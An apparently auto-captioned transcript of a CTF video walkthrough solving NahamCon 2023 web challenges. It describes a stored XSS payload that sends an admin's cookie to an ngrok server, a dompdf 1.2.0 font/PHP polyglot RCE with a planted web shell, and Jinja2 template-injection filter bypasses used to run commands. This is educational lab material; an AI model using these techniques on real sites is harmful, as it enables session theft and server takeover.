NahamCon CTF 2023: Web Challenge Walkthroughs

Video Statistics and Information

Video
Captions Word Cloud
Reddit Comments
Captions
in this video we're going to take a look at some of the web challenges from the hamcon CTF 2023 I already made a video for marmalade 5 for the Integrity channel so I'll leave a link to that in the description below I won't be covering that again in this video but let's start off with Star Wars which has the most solves at the moment the description says if you love Star Wars as much as I do you need to check this block and we've got an instance already launched so let's go and take a look at it all right so we get through to this X-Wing page we've got a login box that says invalid session we need to sign in so I'm going to try admin admin and it says invalid credentials let's go and sign up instead then and normally I just try to see if we can register an admin account just out of Interest try to do that but it says the username is taken so let's do cats cats cats sign up successful and we'll log in and we log in we can see that we've got this blog post we can click on read more and down here we have a comment box so it's gonna be worth going to try some stuff in here we could have a look at our source code we could have a look see if there's any more posts can we just change this to two maybe there's something interesting there but if you get through to this page and see there's a comment box that's probably where you want to start focusing and maybe to begin with you'll just try something to see whether you can actually inject some HTML in here so can we do like a header say hi and then H1 send that and see does it render in big and it does it says that it needs to be reviewed which is interesting maybe that means that some administrator who's actually checking our posts if that's the case then what if we have some kind of script in here which reflects back to the admin whenever they are reviewing the comment because then it will execute in their browser and maybe they've got some interesting cookies do we have any cookies let's have a look we've got this one here which is a JWT which makes sense because we've just registered and logged in so let's try and put a script in here first thing we want to do is have somewhere for this to call back to because we want to retrieve the admins cookie and to do that if we have a script in here we need the cookie to go somewhere and that's going to be to a server that we control so I'm going to use webwap here which is an alias I have just to create a python web server that's the command in case anybody wants it I'm also gonna open up a engrock server so we'll do engrock HTTP 8C and basically this is our local HTTP server so it can't be accessed from the internet and this is just exposing it to the Internet so we're saying that we want you to redirect any request to and from the local HTTP server to an actual web address which is this one here I'm going to take a copy of it and then this is what we're going to use so let's go back there's a lot of different ways that you could do this a lot of things you could try let me just create some script tags first of all close that off and the way I did this was New Image and then we set the source to be equal to our server and then we want to grab the cookie so I'm going to say C equals you don't really need this here just so we can separate things out okay and then we say plus document dot cookie and that looks good to me let me try and click on send there we go the admin will review it so now we just need to wait for the admin to review it we go down to our server and it was very quick you see we've got this request although this might be our token from the page reloading I think it was yeah notice these two tokens are different so whenever we posted that it refresh the page so it's actually triggered on our browser so we've stolen our own cookie and that's not what we want we want this cookie here and we can just go and replace the one that we have do F12 or do this in your sweet repeater refresh the page and we now have access to an admin panel we go and open that up and we see that we've got our flag the next challenge is called stickers and the description says woo stickers hackers love stickers you can make your own with our new website and we're told that the flag is at the root directory flag.txt and we've got a web service connect to no Source codes downloads so let's go and take a look at it we open it up and it's a sticker shop and we can put in some information here so the first thing I did was just try to put in some server-side template injection payloads just to see whether these render as they are or do they turn into a 49 and I put this into each of the form fields and submit however there is some validation so we can do an actual email try and submit again we'll be told we need a number and we'll basically be told this for each of the fields so I'm just gonna do that now submit the organization name doesn't render so it doesn't look like there's an ssti vulnerability there's no form validation now so we could go and try to change some of the stuff like see if we can actually input characters in here and we get an error message so let's go back let's have a look at the requesting burp Suite we don't actually see it here by default you'll see if I refresh the page there's just nothing showing up and that's because it's hiding binary content so we can just tick this box click apply and then we'll see all of these requests in here and it means we can have a look at the headers see if there's anything interesting have a look through the content and very quickly we'll see Pi Dom PDF 1.2.0 so the first thing we should do here is search Pi Dom PDF 1.2.0 exploit we do that we'll get plenty of results back about a zero day in Dom PDF and there's a GitHub link here this is the one that I went through by positive security it has POC so there's a demo application and then exploit as well so you can test this out locally and here's the attack so the Dom PDF 1.2.0 is vulnerable to remote code execution via a true type font and PHP polyglot file and here's a summary of the attacks so the attacker injects some CSS into the PDF exporter the PDF exports requests the font from our server we deliver a malicious PHP font and then it's going to send us back the PDF and now we can go and find that cached font which is actually some malicious PHP script okay all good so far so we can clone this repo we can run we don't need to run the demo application because we've already got one but we can run the exploit server and if you follow this through it will work the only thing is it's currently set to call PHP info so we would want to change that to be something malicious like a reverse shell and we can do that just with this repo there's also another link which I'm going to take a copy of because if you want to do this manually from the start then this would be a better article to go through this basically tells us we can look for uh on on our system we can copy that font to a PHP file and then we can add to the end of that our reverse shell we create a malicious CSS which has some details in it this is important because the name of the font and then the weights and the style will be used to actually find the font once it's been uploaded so you see here the path is Don pedia lib fonts and then the name of the font underscore the font weight slash style underscore the md5 of the URL which we get down here making sure that you use the dash NFL to remove the new line so we need to do this manually if we're using the example we have here we basically just need to make sure that we use whatever they've got so exploit font underscore normal underscore and then we need to update the md5 with the address of wherever we're hosting this PHP script okay so you can pick either of these to do I guess let's go go through the manual version why not I'm going to take a copy of this this is actually incorrect I should be looking for ttf not PDF so I'm going to search here for ttf oh that's not ttf that's tff all right next up I'll just grab any of these I'm going to do copy and then we'll copy it to what name do we have here that was evil.php it doesn't really matter as long as we know what it's called but I'll save it to evil.php and then I've also got a web shell in here that I use very standard PHP shell and we want to insert this basically to the bottom of the script we need to use the get parameter here because if we put in our reverse shell location our URL then you'll have a problem if basically if you use an ngrok like I use you can only use it once at a time so if you want to use it for your HTTP server and for your TCP you'll need to do one after another and we don't get the TCP URL until we've exited the HTTP URL so we have to basically use this so I'll open up evil.php it's going to say it can't render it but let's just try okay this is a really big one the example online is Tiny hopefully that doesn't cause any problems that's it we'll save that in there I don't know why I always get this error message and let's go back we also need a CSS so so we create evil.css and we put in the font information in here we need to put in our URLs so I'm gonna create a web server here again so we'll do web up and then I'm going to split this I'm going to do ngrok HTTP 8C we get this URL and that's going to be the URL that we use so we'll go and paste this in here save that and now we need to get the md5 for that as well so we'll do Echo dash n and then the URL followed by evil.php and then we want to send that to md5 sum there we go that's our md5 we'll need that shortly as well okay I think that's all looking good so now we need to go and basically load this in the PDF converter so where we had the organization I'm going to paste this in I need to grab the ngrok URL again and just replace this and that should be that let's hit enter let's go back and we can see the request to evil PHP and evil CSS that looks good all right now we need to go through then and let me take a copy of this I'm going to paste this in here and let's just grab an example of what we want here so here's the path it's basically going to be the same because we called it the same thing the only thing that's gonna be different is the md5 so I'll go and update the path they sat in there go and grab the md5 where was it was in the terminal take a copy there we go we run that and we get back our font which is good so we've located our file that we've uploaded now we do CMD equals and then whatever we want so do here the problem is I use such a big font file now we have to scroll down all the way to the bottom of it to actually list out the file directory I guess if we go to burp Suite it might look a little bit better let's go and then let's try and do cats Plus for the URL encoding and then flag.txt send scroll down all the way to the bottom and there's our flag the next challenge is called hidden figures and the description says look at this fan page I made for the hidden figures movie and website not everything is what it seems and again we've got no source code so just open up the website go and take a look at it there's a lot of links on the page which don't go anywhere so you can see whenever you highlight them you just have this little anchor symbol at the bottom and that's the same with all of the links on the page as far as my where so we can have a look at the page source and see if there's anything of interest in here notice that we have our assets directory so we can go into assets and then let's see if we list the directory we can see what files are in here I went through all of these files a lot of them just seem to be fairly default files didn't have anything hidden in them we have our image here is one thing so we'll download the image let me save that so I did notice that said PNG but it was actually jpeg whenever we tried to download it so we might check the XF data on this oh I'm in the wrong directory except tool hidden figures just see if there's anything of interest in here any interest in strings obviously it's mentioning hidden figures as the challenge name which is a bit of a hint that might be something hidden somewhere I was also thinking with the CSS as well maybe we could go and have a look at the style sheets we have one with 3840 rules so I had a look through here just doing some keyword searches for flag and things like that but yeah nothing of Interest we don't have any cookies or anything like that oh where is my storage there we go yeah well we do have cookies but no cookies of interest for the site although there is this one in local storage test is one I tried playing around with this as well I don't it just resets every time you reload the page so yeah that didn't get us anywhere however one of my teammates noticed if you search through the source code of the page there are some very large base64 encoded strings around the images so you can see that we don't have word wrap on here so let me move all the way over to the right scroll down here's one of them in fact let me take a copy of all of this and we'll go and put it into Sublime and then we'll be able to see the word wrapping a bit better I don't know does it have it on by default yes okay so here's a big chunk here so we've got a big chunk of base64 encoded data and what we can do is extract this base64 decoder and then go and see does it match up to what we have for the image already so you can see we've got some different images in here this is the thumb image so let me go up to the image that we downloaded the cover image I think it's this one yeah so here is hidden figures paperback movie and then we have all this b64 encoded data if you try to highlight all that it's going to take a just to scroll through it so what I'll do is just save this to a new file just double click or triple click to select the whole thing and then we'll just take out the bits that we don't want all right so where does it start it is here so take that out and then we'll just replace the spaces with nothing and there we go so we can save this now to a file we'll call it data Dot b64 and now if we base64-d to decode the data and let's send that to file let me minimize this we can see it a bit better and now we can do file file we'll see it's a JPEG image so we could just open that up as well let's do a diff on the hidden figures and the file so they differ or I'm going to move file to new.jpg and let us have a look what we've got so new DOT jpeg so you can see there's a difference in the file size of these two so you might try and do like checking strings greater than 10 characters do that in new DOT jpeg do the same in hidden figures but we don't get anything of interest from doing that we could also check the access tool for the new.jpeg to see if that matches and it does we can try bin walk to extract the files this didn't work for me I don't think let me try this again oh what's the name of it oh it didn't create a folder at all okay but it did show that two files let me do foremost new.jpg and let us do tree output I noticed that there's two jpegs in here so go to the output folder we have a look at the jpegs and we've got our cover image and then we also have another image saying thank you Mario but our princess is in another Castle so we could analyze these images a little bit further I did do that as well but there was nothing more to find and it says in another Castle so this is kind of a hint that maybe we should have a look to see if there's anything else of interest on the site and if we do that we'll see basically that we have some other base64 encoded images so I'm going to scroll down let's grab this one at the bottom I can't remember which one it is now so let's grab this one we'll do the same thing again here just extract we could use some regex to do this it'd probably be a quicker way to do it overall but this will be fine for now so I'm going to do that again let's do that again and we'll check the file it is jpeg again so we'll move the file to new.jpg I'm just overwriting the old one I'm going to remove the output folder so we can run foremost again we do that and let's go and check the output output we've got a PNG this time and the PNG has the flag net now the only thing is I couldn't be bothered typing all this out so I just had a quick Google on how we could do that automatically let's go into the PNG folder we'll install tesseract and now we can do Tesseract Dash L for language is English and then we'll give it the PNG file and then we want that to print to Output we'll just print out the output.txt and there's our flag we can just go and copy and paste it now the next challenge is called obligatory and the description says every capture flag composition has an obligatory to-do list application right and again no Source codes let's just open up the challenge page and it tells us to log in as usual and try some default credentials might try and run it through SQL map or something like that but we've got a sign up link so let's go there instead I did try and register as admin but as usual it was taken so let's register cap we'll log in as cats and we get through to the to do application so as usual we might try some injections here let's see can we put in a H1 tag and see if it renders but it doesn't what can we do with it we can select it we can delete it we can have a look at our completed and active challenges or tasks but yeah nothing of Interest maybe we'll try some server side template injection payloads what I did actually was I went to hat tricks ssti and grabbed a polyglot search for poly here we go all right so we can grab this one and just try and find out does it come back with some error message or any kind of Blacklist filters we add this here submits but it doesn't there doesn't seem to be any issues the text just renders as text and I did try some of the things here like using SQL map and also brute forcing other ssti payloads because I thought this was going to be the issue but yeah the notes doesn't seem to be vulnerable so what else do we have let's try and create another task and one thing that we do have when we do that is just redirecting us back to the same page with this get parameter success equals task created so what about if we take a copy of that ssti polyglot paste it in here and then hit enter and notice we've got back this message saying hacker detected the following are not allowed and then we've got a lot of different blacklisted words and characters so we know where we want to try our payloads we can go back to hat tricks and try some of the stuff that we have in here if you search for bypass that's what we're going to be particularly interested in so do we have any it's looking for the options on the side which is kind of annoying here we go bypass filters note that spring framework here we go python check out our following page to learn tricks on arbitrary command execution bypassing sandboxes in Python and we can go through to this and basically start trying payloads to see what gets blocked and what isn't I mean we can see what's filtered out anyway so we know that we're not able to use underscores we know that we can't use dots we can't use any of these words exec eval system P open so quite a lot of things are blacklisted we scroll down for a while so we could try some of these payloads we know that built-ins is blocked we know the P open is blocked that's not P open it's open but we have discover arbitrary execution so this one has a good example which actually uses hex to filter out the or to replace the underscores to bypass any checks on underscore so that's one thing we'll need to do because we know that we can't use underscores but we can also use that technique more generally on text or we can use concatenation as well so we could just use like a plus in between instead of saying class we can say CLA plus SS and that won't trigger off that check so let me take a copy of this one let's go back this isn't going to work because there's a lot of stuff in there which is not allowed come back saying hacker detected well actually the very first one of that is blocked which is class let me go to the payloads all the things links so this is a Ginger 2 filter bypass and I kind of started with this one so I started with this let us enter that it's not going to work because we have we don't have globals blocked but we have built-ins blocked so if we take out this bit basically just want to try and filter this down oh I'm missing the curly braces at the end and you can see that it does actually print out the globals so we could take a copy of this and go and put this into sublime or go and put it into actually something to format the Json would be better you can go to like Json stack viewer I often use not having my favorites here I guess if you have like an extension in code maybe this will format automatically as well but yeah we could go and have a look through this and see what we have access to really there's not too much of a complex filter I was overthinking this at the beginning and trying to use like extra request parameters so rather than oh where's my page gone rather than submitting the blacklisted words in this success parameter you can include another parameter like C equals and that would have built-ins and then you would reference that in this parameter but the problem is you can't use dots so in order to access the request parameter you have to do like request dot param or something which won't be possible however we don't need that we can basically just go and add some concatenation and some more hex encoding so let me take a copy of this again let's go over to Sublime and we'll paste this in oh that was the wrong one I meant to copy the one from payloads all the things okay we'll paste this in here we're not allowed to use built-ins so we can say built and then we can just do a plus in between so there we go we've separated those and I think we can't do that with we can't use import either so again just the same thing adding a plus in there we can't use P open so a lot of plus there as well and I think that's it let's try and do that and there we go we get back our ID actually whenever I try to do this that didn't work I had to use a reverse shell in order to get it let me try now I mean that works so I guess we can just try and do now cats flag Dot txt although oh we can't use spaces and we can't use dots actually either um okay let's go to cyber chef and we'll convert the command from hex I've got too many things open I'm going to start closing things down all right so capflag.txt I'll take a copy of this we'll put it in a cyber chef and then we'll convert it to hex and we will make sure the format is backslash X take a copy of that and then we'll just replace this here we do that and we don't get the flag oh I know why because the flag isn't there actually okay let's do LS see I got a shell last time and then realize we have to go and enumerate a little bit so you can see LS works let me we can't use spaces so I'm going to do lsdb we'll take a copy of that and then paste that in here and we've got this DB sqli and what I did you could do this in a few different ways we'd copy that over and open open like sqlite browser what I did was just strings on DB and what was it called again well you could do db.sqlite you could also just do an asterisk here as a wild card and just say give us a strings because there's only one file in there anyway so let's paste this in submit and you see that we get back the database the strings from the database which contains our flag so those two more web challenges left which is Museum and transfer I did spend a bit of time on museum but haven't made much progress so if I do get it solved I'll add it to the video but I have some things to do today and I want to try and get this edited and uploaded ready for tomorrow reminder that I'm not recording the marmalade 5 Challenge on this channel because I've done that over on the Integrity Channel there'll be a link down to that in the description and also link to the write-ups for this so for each of the challenges that I've sold I also made a write-up so if you're interested in seeing the solve scripts or anything like that you can check the GitHub Link in the comments anyway hope you enjoyed this video if you have any questions or comments as ever leave them down below thanks
Info
Channel: CryptoCat
Views: 9,382
Rating: undefined out of 5
Keywords: NahamCon, NahamSec, NahamConCTF, NahamCon CTF, NahamSecCTF, NahamSec CTF, CTF, Capture the Flag, John Hammond, XSS, SSTI, polyglot, ttf, domPDF, RCE, remote code execution, PoC, WAF, WAF bypass, JWT, steal cookie, web, web security, bug bounty, oscp, pentesting, pen-test, hacking, ethical hacking, learn to hack, dvwa, DVWA, javascript, python, html, burp suite, burp, intruder, repeater, devtools, portswigger, appsec, websec, infosec, cybersecurity, hackthebox, CVE, vuln, exploit, coding, ngrok, intigriti, bug, bugs, free, ctf
Id: XHg_sBD0-es
Channel Id: undefined
Length: 26min 8sec (1568 seconds)
Published: Sun Jun 18 2023
Related Videos
Leaking Secret Data with a Heap Overflow - "Leek" Pwn Challenge [Angstrom CTF 2023]
CryptoCat
2.5K
Web Challenges [Space Heroes CTF 2023]
CryptoCat
5.2K
How to Game on Linux
Drew Howden Tech
605
HackTheBox Certified Penetration Testing Specialist (CPTS) - Review + Tips
CryptoCat
32K
Forensics Challenge Walkthroughs - DownUnderCTF (DUCTF) 2021
CryptoCat
11K
Web Challenge Walkthroughs - Digital Overdose CTF 2021
CryptoCat
4.6K
How Hacking Actually Looks Like - ALLES! CTF Team in Real Time
LiveOverflow
999K
0: Intro/Basics/Setup - Buffer Overflows - Intro to Binary Exploitation (Pwn)
CryptoCat
47K
Reverse Engineering (RE) Challenge Walkthroughs - PicoCTF 2022 (BEGINNER-FRIENDLY Capture The Flag)
CryptoCat
7.7K
🔥Google Cloud InDepth Tutorial | Google Cloud Platform Tutorial 2023 | Cloud Computing | Simplilearn
Simplilearn
199K
CAN I WIN A GAME OF BATTLEGROUNDS?! [HackTheBox - Server Siege]
CryptoCat
5.7K
HackTheBox Cyber Apocalypse 2021 CTF - Web Challenge Walkthroughs
CryptoCat
9.6K
Web Challenge Walkthroughs - PicoCTF 2022 (BEGINNER-FRIENDLY Capture The Flag)
CryptoCat
10K
How to Approach an OSINT Challenge - "Photographs" [INTIGRITI 1337UP LIVE CTF 2023]
CryptoCat
1.4K
Tier 2: Markup - HackTheBox Starting Point - Full Walkthrough
CryptoCat
8K
TryHackMe! LIVE King Of The Hill
John Hammond
128K
Solving all Web CTF tasks from NahamCon
Bug Bounty Reports Explained
11K
ChatGPT tries a BASIC Capture The Flag (CTF) Challenge
John Hammond
140K
Capture the Flag | Hacking Challenge | ITProTV’s Live Week 2019 Replay
ITPro
162K
TLS Handshake Deep Dive and decryption with Wireshark
David Bombal
257K
Note
Please note that this website is currently a work in progress! Lots of interesting data and statistics to come.